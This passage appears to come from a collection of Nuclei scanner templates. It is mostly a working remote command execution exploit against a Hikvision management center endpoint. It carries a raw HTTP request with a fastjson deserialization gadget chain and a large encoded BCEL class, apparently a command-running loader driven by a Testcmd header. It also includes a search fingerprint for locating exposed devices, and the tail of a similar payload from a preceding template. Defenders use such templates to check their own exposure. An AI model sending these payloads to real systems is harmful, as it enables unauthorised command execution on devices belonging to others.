c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}
22 | }
23 |
24 | matchers:
25 | - type: dsl
26 | dsl:
27 | - "contains_all(body, '{{randstr}}','unknow error') && status_code==200"
--------------------------------------------------------------------------------
/Hikvision/30海康威视运行管理中心 centerapisession 存在远程命令执行漏洞.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_30
2 | info:
3 | name: 海康威视运行管理中心 center/api/session 存在远程命令执行漏洞
4 | author: YanXi
5 | severity: critical
6 | description: description
7 | reference:
8 | - https://
9 | metadata:
10 | verified: true
11 | hunter-query: web.icon="e05b47d5ce11d2f4182a964255870b76"
12 | tags: Hikvision
13 | http:
14 | - raw:
15 | - |
16 | POST /center/api/session HTTP/1.1
17 | Host: {{Hostname}}
18 | Accept: application/json, text/plain, */*
19 | Accept-Encoding: gzip, deflate
20 | X-Requested-With: XMLHttpRequest
21 | Content-Type: application/json;charset=UTF-8
22 | X-Language-Type: zh_CN
23 | Testcmd: echo test
24 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
25 | Accept-Language: zh-CN,zh;q=0.9
26 | Content-Length: 5780
27 |
28 | {"x":{{"@type":"com.alibaba.fastjson.JSONObject","name":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource"},"c":{"@type":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource","key":{"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driver":"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}:"a"}}
29 | matchers:
30 | - type: word
31 | part: body
32 | words:
33 | - test
34 |
--------------------------------------------------------------------------------